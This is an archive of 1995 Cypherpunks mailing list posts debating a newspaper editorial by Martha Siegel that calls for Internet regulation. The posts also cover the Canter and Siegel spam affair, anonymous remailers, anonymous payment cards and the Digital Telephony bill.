Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Here is a guest editorial that ran in Monday's SF Chronicle. It should make your blood boil. S a n d y * * * ANARCHY, CHAOS ON THE INTERNET MUST END Elections are over, and for better or worse, recognized leadership is installed and working in most places. Yet, in Cyberspace the electronic world dominated by the much-vaunted Internet, there is not much order. This huge international computer web tying together about 30 million people is governed by no one. What an amazing state of affairs. The most powerful communications medium ever invented is being left to the equivalent of mob rule. Last year was the year of the Internet in the media. Clearly it is now mainstream. Nonetheless, judging by what you read or hear, the key question of who runs it is not even an issue. It is more fun, after all, to contemplate shopping in an electronic mall or how to order a pizza through a modem. No matter, if you scratch the surface of this big, happy party, the need for firm direction is all too obvious. Also reported in the press is an expanding array of Internet problems. Unregulated broadcasting of sexually explicit material that is readily available to children usually heads the list, but on-line sexual harassment, profanity, defamation, forgery and fraud run close seconds. The secretiveness that computer communications allows is a special reason why abuse is easy. National and personal security are serious considerations when anyone can, with complete anonymity, send encrypted information worldwide via the Internet. Such problems are further exacerbated by a computer located in Finland called the Anonymous Server, which exists for the sole purpose of laundering computer messages, much like dirty money is laundered through small island nations. Consequently, if you want to, say, threaten someone with death, your risk of retribution is small, courtesy of the Anonymous Server. Nowhere are Cyberspace difficulties more evident than in the inevitable swing toward Internet commercialization. The widely reported turf war rages between academic factions that controlled the Internet before it went public and business newcomers who now want access to its huge audience. Electronic attacks on business people by means ranging from computer insults, called flames, to assorted forms of electronic vandalism, persist uncontrolled. Worst of all are the ``canceller robots,'' computer programs meant to erase the communications of anyone the hackers who usually launch them wish to silence. These self-styled vigilantes routinely challenge free speech in Cyberspace unabated. Internet access providers, companies that connect people to the Internet for a profit, likewise assume the role of censors, arbitrarily closing accounts of those whom they disapprove. Given its international nature, one obvious way to bring much needed order to the Internet is through diplomacy. The United States should lead in this. A good beginning might be to urge the Finnish government to deactivate the Anonymous Server. Diplomacy could also help to establish an international standard of recognizing laws existing at the point of origin as controlling the message sender. When conflicts arise, governmental diplomacy should again be the answer, just as it is with other trade and communications issues. Next, laws already regulating behavior in the real world should be applied in Cyberspace. This is already taking place on a case-by-case basis, but the process is too slow. The Supreme Court should act to crate a precedent stating that crime is crime, even when the criminal instrument is a computer keyboard. In the United States, legislation should be passed making Internet access providers common carriers. This will get them out of the business of censorship and under the guiding hand of the Federal Communications commission. People need safety and order in Cyberspace just as they do in their homes and on the streets. The current state of the Internet makes it clear that anarchy isn't working. If recognized governments don't find a way to bring order to the growing and changing Internet, chaos may soon dictate that the party is over. ---------- Martha S. Siegel is the author of ``How to Make a Fortune on the Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. * * * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From asgaard at sos.sll.se Tue Jan 3 11:05:37 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 3 Jan 95 11:05:37 PST Subject: Press attack on anonymity. In-Reply-To: Message-ID: James A. Donald wrote: > higher authority of which I spoke earlier -- who is > anonymously attacking anonymity. > the government speaking -- a government department with guns is > running up a trial balloon. Expected and hardly anything to go into public dispute about. Cypherpunks are here to circumvent the measures of various governments by technical means. Since Joe User doesn't really care if he can connect anonymously or not, at least not yet, they might very well succeed in making some aspects of anonymity 'illegal'. But who cares, if anonymous agents can't be traced? Mats From quester at eskimo.com Tue Jan 3 11:28:50 1995 From: quester at eskimo.com (Charles Bell) Date: Tue, 3 Jan 95 11:28:50 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: Message-ID: The author of this editorial is the Siegel of Cantor and Siegel fame, nicht wahr? Perhaps someone with detailed knowledge of that brouhaha should write the Examiner and point out that they allowed their editorial page to be used for ex parte pleading by one of the worst offenders in the history of the Internet -- and without informing their readers they were doing so. From jeffb at sware.com Tue Jan 3 11:38:29 1995 From: jeffb at sware.com (Jeff Barber) Date: Tue, 3 Jan 95 11:38:29 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: Message-ID: <9501031929.AA13882@wombat.sware.com> Sandy Sandfort writes (quoting SF Chronicle article): [ Much bs elided ] > Martha S. Siegel is the author of ``How to Make a Fortune on the > Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. Isn't this the Siegel of the infamous "Canter and Siegel"? -- Jeff From mclow at coyote.csusm.edu Tue Jan 3 11:42:04 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Tue, 3 Jan 95 11:42:04 PST Subject: SAN FRANCISCO EDITORIAL Message-ID: Sandy wrote: >C'punks, > >Here is a guest editorial that ran in Monday's SF Chronicle. It >should make your blood boil. > [ ranting gibberish deleted ] > >Martha S. Siegel is the author of ``How to Make a Fortune on the >Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. > Not _the_ Martha Seigel, of Cantor & Seigel, targets of fine cancelbots everywhere? -- Marshall Marshall Clow Aladdin Systems mclow at coyote.csusm.edu From unicorn at access3.digex.net Tue Jan 3 11:55:53 1995 From: unicorn at access3.digex.net (Black Unicorn) Date: Tue, 3 Jan 95 11:55:53 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: Message-ID: On Tue, 3 Jan 1995, Sandy Sandfort wrote: > Date: Tue, 3 Jan 1995 10:58:09 -0800 (PST) > From: Sandy Sandfort > To: Cypherpunks > Subject: SAN FRANCISCO EDITORIAL > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > Here is a guest editorial that ran in Monday's SF Chronicle. It > should make your blood boil. > > > S a n d y > > * * * > > ANARCHY, CHAOS ON THE INTERNET MUST END [Trash about mob rule, and the need for international diplomacy (Read U.S. imposition of local law to foreign sovereigns) to correct the problem, happily deleted.] > > Martha S. Siegel is the author of ``How to Make a Fortune on the ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz. ^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^ I guess anonymous posting abilities just kill the internet direct mail business hmmmm? 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From paul at poboy.b17c.ingr.com Tue Jan 3 12:04:13 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Tue, 3 Jan 95 12:04:13 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: Message-ID: <199501032006.AA04977@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Despite the odiousness of the source, might it be a Good Thing to get a law giving ISPs common-carrier status passed? When you're a common carrier, no one hassles you about the content you pass-- this would make it much easier for anon remailers to flourish. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwmuSafb4pLe9tolAQF/EwQAkaG3Aeg5NRAXtlC7EkhQz1iONk0cBFSA a8CS+w0MgIK2ZpdQRfXDQuBrZ1Mowx1OTEaw4pZayIomFWAb1D4Kkdi8NKgBN53C Y4T8KEri2xSP3MESjKGcqw8p8ps/8W4ylGw2xyatIq8GWilNb9DHe5Y+/fxCkcyg aONdWuogsQE= =dYl4 -----END PGP SIGNATURE----- From hayden at krypton.mankato.msus.edu Tue Jan 3 12:11:05 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Tue, 3 Jan 95 12:11:05 PST Subject: Stegno for Kids In-Reply-To: <9501031834.AA21554@elysion.iaks.ira.uka.de> Message-ID: On Tue, 3 Jan 1995, Hadmut Danisch wrote: > I had something like that as a toy about 20 years ago. A single pen with > tips on both sides. One to write, the other to develop. Didn't they have it > in America also? There was also this thing where you would get these books and a magic marker, and they you would do puzzles in the book, and use the pen to develope the answer. The old Infocom hint books also used a similiar setup. ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> All I want is a cure... \/ Finger for PGP Public Key <=> And all my friends back! From dcwill at python.ee.unr.edu Tue Jan 3 12:55:30 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Tue, 3 Jan 95 12:55:30 PST Subject: Press attack on anonymity. Message-ID: <199501032101.QAA27544@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Forwarded message: - From dcwill at python.ee.unr.edu Tue Jan 3 11:52:23 1995 From: "Dr. D.C. Williams" Message-Id: <199501031952.LAA04685 at python.ee.unr.edu> Subject: Re: Press attack on anonymity. To: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 3 Jan 1995 11:52:15 -0800 (PST) Cc: dcwill at python.ee.unr.edu (Dr. D.C. Williams, P.E.) In-Reply-To: from "Mats Bergstrom" at Jan 3, 95 08:05:49 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 842 Mats Bergstrom wrote: > Since Joe User doesn't really > care if he can connect anonymously or not, at least not yet, > they might very well succeed in making some aspects of anonymity > 'illegal'. But who cares, if anonymous agents can't be traced? Because then the last, unstoppable act of the State will be to clamp down on anonymous agents. See "How to Boil Live Frogs". You can't dump them into boiling water because they will jump out. Instead, start at a comfortable temperature and turn up the heat a little bit at a time. Eventually, the frogs become unable to escape and are lulled to their unconscious death. I equate "making some aspects 'illegal'" with increasing the water temperature. To paraphrase and oft-seen .sig from this list: "Seldom is freedom of any kind lost all at once." =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwm6/ioZzwIn1bdtAQGuRwGAobH2lCXDIHUCitG1mcI0RasjMOWjovT2 xUpa1Xta/mphm/s+2H21f7kuFvY6smcn =wclb -----END PGP SIGNATURE----- From koontz at MasPar.COM Tue Jan 3 13:44:53 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Tue, 3 Jan 95 13:44:53 PST Subject: Press attack on anonymity. Message-ID: <9501032146.AA19980@argosy.MasPar.COM> Sandy Sandfort posted an editorial from the Mondays SF Chronicle. There is a front page story in todays San Jose Mercury News on why anonymity is a bad thing. Its from a New York Times story by Peter H. Lewis The question is who launched all this stuff? From sandfort at crl.com Tue Jan 3 13:47:13 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 3 Jan 95 13:47:13 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Tue, 3 Jan 1995, Charles Bell and several others wrote along these lines: > The author of this editorial is the Siegel of Cantor and Siegel fame, > nicht wahr? > > Perhaps someone with detailed knowledge of that brouhaha should write the > Examiner and point out that they allowed their editorial page to be used > for ex parte pleading by one of the worst offenders in the history of the > Internet -- and without informing their readers they were doing so. Gosh, my education seems to be remiss with regard to the case/ incidents referred to. Could someone let us know who this person is and what her claim to fame is? (It certainly isn't her logic or writing ability.) S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From marsha-w at uiuc.edu Tue Jan 3 13:52:15 1995 From: marsha-w at uiuc.edu (Marsha-W) Date: Tue, 3 Jan 95 13:52:15 PST Subject: LAW AND ETHICS ON THE "NETS" Message-ID: Looks like more of a push for regulation: Charles Bell thought you all might have something to say about this... ------------------------------------------------------------------------------ ABA SCI/TECH SECTION, IPPP COMMITTEE LAW AND ETHICS ON THE "NETS" December 8, 1994 The John Marshall Law School's Center for Informatics Law, in conjunction with the ABA Section of Science & Technology Committee on Information Practices, Policies, and Privacy, is undertaking a project entitled, "Law and Ethics on the 'Nets'" (LEON). The development of a national information infrastructure and a global electronic network, of which Internet is the backbone, has presented a multitude of legal and ethical problems involving use and abuse of the networks, nationally and worldwide. Almost on a daily basis, news items announce electronic network transmissions constituting hate mail, profanity, vulgarity, obscenity, child pornography, sexual harassment, defamation and invasion of privacy. The violation of intellectual property rights and information system security are also frequent occurrences. National and international discussions consider such questions as what "rules of the road" ought to apply, who can make them, how can they be enforced, and what will be the legal and political relationships between states and nations regarding cyberspace? It is argued that at present the lawless, the intolerant and the disrespectful seem able to pollute the worldwide information stream with little constraint. Certainly, the current state of anarchy in national and global electronic networks cannot continue if the technology is to achieve the remarkable benefits that have been predicted in terms of communications among institutions and individuals, whether government, business or society at large. The purpose of the CIL/S&T project is to promote a dialogue that can lead to recommendations for treating with the many issues at hand. We solicit the participation of the Sci/Tech IPPP Committee (and interested others!) in addressing the foregoing issues. Please send me your expression of interest -- indicating what specific aspects of the various questions you would like to address, and then I'll organize us into some working groups. PLEASE LET ME KNOW YOUR INTERESTS BY JANUARY 9, 1995, SO WE CAN STRUCTURE THE PROJECT AND PROMPTLY GET UNDER WAY. We plan a program on the project for the ABA annual meeting in Chicago next August, and we hope to generate a publication for the Section concerning the project results. George B. Trubow, Professor of Law Director, Center for Informatics Law The John Marshall Law School 315 S. Plymouth Ct. Chicago, IL 60604-3907 Fax: 312-427-8307; Voice: 312-987-1445 E-mail: 7trubow at jmls.edu Marsha Woodbury marsha-w at uiuc.edu U of Illinois/Urbana-Champaign FAX 217-356-7050 Home 217-337-0001 Work 217-244-0780 http://www.cpsr.org/dox/global.html From perry at imsi.com Tue Jan 3 14:01:58 1995 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 3 Jan 95 14:01:58 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: Message-ID: <9501032202.AA13835@snark.imsi.com> Sandy Sandfort says: > Gosh, my education seems to be remiss with regard to the case/ > incidents referred to. Could someone let us know who this person > is and what her claim to fame is? (It certainly isn't her logic > or writing ability.) Martha is a de facto disbarred attorney, who, along with her equally slimey hubby, also a de facto disbarred attorney (both resigned from the Florida bar for ethical violations rather than be disbarred), began posting to every group on Usenet a scummy ad explaining that if people would only pay them a bunch of money they would file entries into last years green card lottery for their clients, who, of course, could have simply sent their letters in on their own for free. The net reacted rather violently to their spamming, because unlike most rational individuals they contended that they were doing something perfectly decent and honest. People stopped them in the long run by rigging up cancelbots to administer the Usenet death penalty to them. No one would be giving them a shred of respect, except for the fact that a certain New York Times reporter named Peter Lewis appeared to miss the point in certain articles he published about the incident. Perry From speed at cs.washington.edu Tue Jan 3 14:17:58 1995 From: speed at cs.washington.edu (Erik Selberg) Date: Tue, 3 Jan 95 14:17:58 PST Subject: SAN FRANCISCO EDITORIAL Message-ID: <199501032218.OAA03693@meitner.cs.washington.edu> > C'punks, > > Here is a guest editorial that ran in Monday's SF Chronicle. It > should make your blood boil. > > > S a n d y > > * * * > > ANARCHY, CHAOS ON THE INTERNET MUST END Yup, it's the same net-spamming Siegel, arguing for: End of mob rule, so she can advertise everywhere for free; End of anonymous encryption, so we can't send plans for the new stealth basselope to the commies (or I guess it's liberals, nowaways). End of anonymous mail, so she can tell back at all those who yell at her for spamming Terms of surrender for us academic types, who only exist to attack business people (and, if you're at CMU, check out the nudie pics) End of private providers yanking abuser's accounts basicly, a nice editorial which sugar-coats what she wants, which is the ability to send out what she wants, ensure that it gets to everyone she sends it to, and not worry about flames or getting the boot. What's scary is that it's very easy to slide this kind of stuff onto an ignorant and conservative legislature. Big leaders who want to do good see an obvious good side to removing the ability to post anonymously --- law enforcement can track people making drug transactions, and if someone broadcasts a nudie pick found to be obscene in TN, well hey, they can now haul his ass to TN for some jail time. It's going to take a lot of lobbying to ensure that this doesn't happen. work: (206) 543-7798 Erik Selberg play: (206) 517-3039 speed at cs.washington.edu I get by with a little help from my friends... From sandfort at crl.com Tue Jan 3 14:33:58 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 3 Jan 95 14:33:58 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: <9501032202.AA13835@snark.imsi.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Oh, THAT Cantor and Seigle. If someone with the facts (Perry?) is so inclined, a letter to the editor would be in order. These scum bags need to be exposed. The address is: San Francisco Chronicle 5th and Mission San Francisco, CA 94103 S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From sandfort at crl.com Tue Jan 3 14:34:18 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 3 Jan 95 14:34:18 PST Subject: LAW AND ETHICS ON THE "NETS" Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Thanks to Marsha-W for telling us about the "Law and Ethics on the 'Nets'" project being organized at the John Marshall Law School. I'm signing up. I think ALL of us should, if you get my drift. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From nesta at nesta.pr.mcs.net Tue Jan 3 14:37:58 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Tue, 3 Jan 95 14:37:58 PST Subject: calls for regulation In-Reply-To: Message-ID: This is pretty scary, I mean it always sat in the back of my mind that they would attemt to rgulate the net, and to pass legislation and all, but now that it is rearing it's head and looks like there is going to be a push for it, I am actually concerned, to teh point of fear almost. Not a paralyzing fear, but a definite feeling that action is neccesary now to either head it off, or provide for alternative forms of communication on the Net if it does come. Thank goodness the cypherpunks have been working on crypto, it is at least deployed enough now that any attempt to control that would entail drastic measures, like REALLY drastic. I think perhaps we should make a concerted effort to alert eh rest of the net of these happenings, and to tell them to contact their legislators and such to try and stop it, or at least attempt to stop the hystericism that these articles will drum up in congress. Perhaps someone will be kind enough to write "newsletter" or a post to be spread throught usenet and other BBS's and mailing lists(under control, not spamming or anything) that alerts people on what is happening, and what they can do about it. I am afraid I am to inexperienced as a writer of such things, I could do it, but i am sure that others here would do much better jobs of it, and thus influence mroe action from the people on the net. get on your boots fellas, load your guns too. Loks like a war is starting up, or is it a police action 8) i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From hfinney at shell.portal.com Tue Jan 3 14:44:36 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 3 Jan 95 14:44:36 PST Subject: San Francisco Editorial Message-ID: <199501032244.OAA15281@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Another point re Cantor and Siegel is that there is now a service calling itself CancelMoose which goes through Julf's anon server in Finland (anon.penet.fi) to cancel spams. (Spams are off-topic, nearly-identical posts to large numbers of groups.) This is what Siegel is really upset about. She and her husband are publishing a book telling businesses how they can use spam posts on usenet as free advertising. But now CancelMoose is a relatively accepted counter to these increasingly-frequent spams (pyramid schemes, etc.). This makes their book obsolete and really hits them where it hurts. But they can't sue CancelMoose because its identity is hidden. Personally, I don't like the idea of cancelling other people's posts, spam or not. I would rather see news readers enhanced to detect copies of posts I have already seen and delete them. The awful thing about Cantor and Siegel's Green Card spam was that they didn't cross-post, they used a bot to individually post to all groups. I was shown their message headers for days. Ordinary off-topic posts don't bother me much because I can ignore them easily. With a better newsreader the Green Card spam would have been equally trivial to ignore. The scary thing about cancels is that some proposals have actually been directed at anonymous posts themselves. Someone anonymously posted what purported to be a grisly transcript of the last seconds of the doomed Challenger crew as they fell to the ocean. This caused a great hue and cry and some calls for banning anonymous posts and/or retroactively cancelling them. This led to some very amusing events which Detweiler has chronicled in his FAQ on anonymity, the net result of which was that the idea was discredited. But the emergence of CancelMoose is not an altogether positive event in my view. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLwnTGRnMLJtOy9MBAQGjFAH/WEzWgAEG4mX9c6yR1iyR2nWq3V1AvUBL lC1rTlUWUf8YWZDmVAuOkg8AH8nPo3L1e67l66wMrgGedaCD39/3Aw== =psrV -----END PGP SIGNATURE----- From ben at Tux.Music.ASU.Edu Tue Jan 3 14:45:02 1995 From: ben at Tux.Music.ASU.Edu (Ben Goren) Date: Tue, 3 Jan 95 14:45:02 PST Subject: Stegno for Kids In-Reply-To: Message-ID: Lemon juice makes a good invisible ink for kids. Write the message; heat the paper to reveal it. I used a match, but I suspect a hairdryer would be much more sensible. b& From aarach01 at barney.poly.edu Tue Jan 3 15:01:47 1995 From: aarach01 at barney.poly.edu (Arsen Arachelian) Date: Tue, 3 Jan 95 15:01:47 PST Subject: rarachel - no email Message-ID: Hey guys, It's me. Don't let the new account name, and the horrible name of this despicable machine throw you off. It's me, Ray Arachelian. Some rat(s?) hacked into photon, the machine where my home account lives, and now, while I can read my prism email by going through major acrobatic maneouvers, I have to use this slimy shitty student account. So for the time being, please direct any mail to this account aarach01 at barney.poly.edu (God I hate this machine's name!) I'll still be able to read anything you send to prism for the time being (durring winter recess they said.) See, I have to log in to barney, ftp my mailbox over from prism, telnet to barney and delete my mailbox, and then read it with pine... :-( [Eileen, could you at least build a home directory for my old account with a .forward to Barney for now? Or just let me use prism without having to have photon connected to it?] Thanks, -- Ray (Arsen) Arachelian. [also known as rarachel at prism/photon.poly.edu, RayDude at aol.com, etc.] From aarach01 at barney.poly.edu Tue Jan 3 15:06:31 1995 From: aarach01 at barney.poly.edu (Arsen Arachelian) Date: Tue, 3 Jan 95 15:06:31 PST Subject: Comdex Disks? In-Reply-To: <199412272331.AA09920@metronet.com> Message-ID: On Tue, 27 Dec 1994, David K. Merriman wrote: > Back some time ago, there was some discussion of giving away disks at Comdex > in NY; by any chance, does anyone have a copy of the contents of what was on > those disks? I'd like to be able to give away 'basic info' in > easy-to-handle format :-) That was my puppy. My friend Sal at panix and I gave the disks away at PC-EXPO and at various other events. I have the lastest disk version of it if you want it, but you'll need to update PGP on the disk and maybe include/add/remove some articles from the articles package. You can call me at 212-618-8818 (work) or email me here, but with the situation with my account, call me instead. (And that goes for anyone else on the list willing to send diskettes out. Please don't call me if you aren't going to give out disks and are just interested in a copy. You can ftp the old copies from somewhere in Canada...) From raph at netcom.com Tue Jan 3 16:59:09 1995 From: raph at netcom.com (Raph Levien) Date: Tue, 3 Jan 95 16:59:09 PST Subject: Siegel and Lewis Message-ID: <199501040022.QAA21291@netcom17.netcom.com> I just got off the phone with Peter Lewis, reporter for the New York Times. He is unaware of any grand consipracy to regulate the Net, but then again if there was one, I don't think they'd tell him. His piece that ran Saturday was badly mangled by the editorial process, especially since it ran on page one. Those articles get to be mangled by a whole new set of people who otherwise wouldn't get to touch it. I think Lewis has basically good intentions, and does do his homework before writing a story. Yecchh. Now I know why I don't rely on daily newspapers for my news (the Internet keeps me up on the fast-breaking stuff, and the Economist fills me in on the rest). The fact that most people rely papers and the even worse TV news does not bode well. Martha Siegel is just fucked up enough that she will probably push for legislation regulating the nets. Congress is just fucked up that they might pass it. Raph From blane at seanet.com Tue Jan 3 17:24:48 1995 From: blane at seanet.com (Brian Lane) Date: Tue, 3 Jan 95 17:24:48 PST Subject: Anonymous payment scheme In-Reply-To: <199501031745.JAA09281@jobe.shell.portal.com> Message-ID: On Tue, 3 Jan 1995, Hal wrote: > > I don't see why a debit card couldn't be anonymous, even to the point > > of having no name, AND no picture on it. Yes, the bank has the money, but > > their only obligation is to dish it out to the vendors/ATMs that you have > > used your card with. Why should a bank care who you are once they have > > your money in the account. > > Again, it is unclear here whether you are proposing that you would be > anonymous to the bank or just have a blank card. As I wrote, banks are I'm aiming towards anonymous from everyone. The vendor, and the bank. > required to get SS#'s for depositers right now, and I wouldn't expect > that to change any time soon. If anything, the trend appears to be > towards more tightening rather than less. Duncan and/or Sandy have > suggested giving a fake SS# when you open your secured account; maybe > that would be legal but it sounds questionable to me. I guess I'm being a little too unrealistic about my wishes. In my ideal case the IRS and the government would have nothing to do with the bank. Fake SS# is a good idea, but noone seems to know exactly how legal this is. They could, for example, claim that you were trying to defraud the bank and/or the IRS. > I used my VISA yesterday, and after swiping it through the now-ubiquitous > card readers the vendor was required by the machine to manually enter the > last four digits on the card. He complained that this was something new > and was happening very frequently now (maybe a change with 1995?). I I hadn't heard of this. Its been a couple of years since I've had a VISA card. > have heard of fraud where people make fake VISA cards (or steal them) and > re-program the mag stripe to have a different number than what is on the > front. Maybe this is a countermeasure for that. It doesn't sound like a > blank card is the direction the industry is going. Does anyone have more > info on this change? That's why I suggested the blank card(no embossing). Without that it makes it more diffcult to get your card number. I envision a transaction like so: 1. Card is swiped and the database is checked for your card # and enough balance for the purchase. 2. If authorized, a receipt is printed without card #. To get your card # the criminal has to either intercept the transaction with the database(not too hard), or comprimise the database itself. As long as you keep your card physicly secure you should be reasonably secure. Brian P.S. I apologize for any misspellings or missing chars. My ISP(seanet.com) misses incoming characters when more than 3 sz sessions are running. ------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------ From pstemari at erinet.com Tue Jan 3 17:48:08 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Tue, 3 Jan 95 17:48:08 PST Subject: Anonymous payment scheme Message-ID: <9501040140.AB27685@eri.erinet.com> At 09:45 AM 1/3/95 -0800, Hal wrote: > ... As I wrote, banks are >required to get SS#'s for depositers right now, and I wouldn't expect >that to change any time soon. If anything, the trend appears to be >towards more tightening rather than less. ... Isn't that only a requirement on interst-bearing, or potentially interest-bearing, accounts? --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From pstemari at erinet.com Tue Jan 3 17:48:13 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Tue, 3 Jan 95 17:48:13 PST Subject: Anonymous payment scheme Message-ID: <9501040140.AA27685@eri.erinet.com> At 08:16 AM 1/3/95 -0500, Robert Hettinga wrote: >Hmmm. What if you produced a pseudonym card *with* your picture on the >front? I smell a market opportunity. Or not... You'd need to promenently state on the front "not to be used for id" or some such. Otherwise you could potentially get nailed for issuing fraudulent identity documents. Too many places think that a MC/Visa is a form of id. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From lile at art.net Tue Jan 3 17:49:51 1995 From: lile at art.net (Lile Elam) Date: Tue, 3 Jan 95 17:49:51 PST Subject: Press attack on anonymity. Message-ID: <199501040143.RAA22066@art.net> Or prehaps it is someone at HotWired... :) -lile From VAMAGUS at delphi.com Tue Jan 3 18:16:11 1995 From: VAMAGUS at delphi.com (VAMAGUS at delphi.com) Date: Tue, 3 Jan 95 18:16:11 PST Subject: H.R.4922 Message-ID: <01HLF9W9HYG2938CN8@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- If I am digging up old info please excuse me, I haven't been able to read the majority of mail due to the volume of, fluff, shall we say. For U.S. cypherpunks this is it: H.R. 4922 "Interception of Digital and Other Communications" passed as of October. This is the first *I* heard about it. In short the bill requires: " ...telecommunications carrier shall insure that it's equipment, facilities, or services are capable of (1) expeditiosly isolating and enabling the government, persuant to a court order or other authorization, to intercept, to the exclusion of all other communications, all wire and electronic communications carried by the carrier....etc. Time for me to generate more keys! More info available at: ftp.eff.org /pub/EFF/Policy/Digital_Telephony/digtel94.bill gopher.eff.org /1/EFF/Policy/Digital_Telephony/digtel94.bill http.eff.org /pub/EFF/Policy/Digital_Telephony/digtel94.bill ***************************Frenchie Sends******************************* * PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. * * As soon as any man says of the affairs of the state * * "What does it matter to me?" the state may be given up for lost. * * J.J.Rousseau - The Social Contract * * PGP info: email to mail-server at rtfm.mit.edu with first line: * * send pub/usenet/alt.security.pgp/* * *****************************J. Francois******************************** -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwoD8LbmxeO+s+1xAQEuCgQAlI0vevAU7Gc1rkraQufpw+1NT9n2qSw5 DIoJvA0lS49ECiZeUOhwNql3cx6tPaOEeMeJIqkcv/PecX3wh3I2AzU2NGmNerOM Z2HPjdoz3xO8u0wDOJbZDRlzQafzbh0RShxAlCxPQE+qspWhmtydMvRl6KtvT1T+ s/kMO5VMkQY= =r8C+ -----END PGP SIGNATURE----- From roy at cybrspc.mn.org Tue Jan 3 18:31:51 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Tue, 3 Jan 95 18:31:51 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: <199501032006.AA04977@poboy.b17c.ingr.com> Message-ID: <950103.173130.6M1.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, perobich at ingr.com writes: > Despite the odiousness of the source, might it be a Good Thing to get > a law giving ISPs common-carrier status passed? > > When you're a common carrier, no one hassles you about the content you > pass-- this would make it much easier for anon remailers to flourish. I can't speak for ISPs in general, but when I still ran a public-access system, the absolute last thing I wanted was to be thought of as a common carrier. While common carriers are held blameless for the content of traffic they pass, they are also heavily regulated. In general, a common carrier may not refuse to provide services unless special circumstances exist. Want to bet Usenet abuse won't be one of those 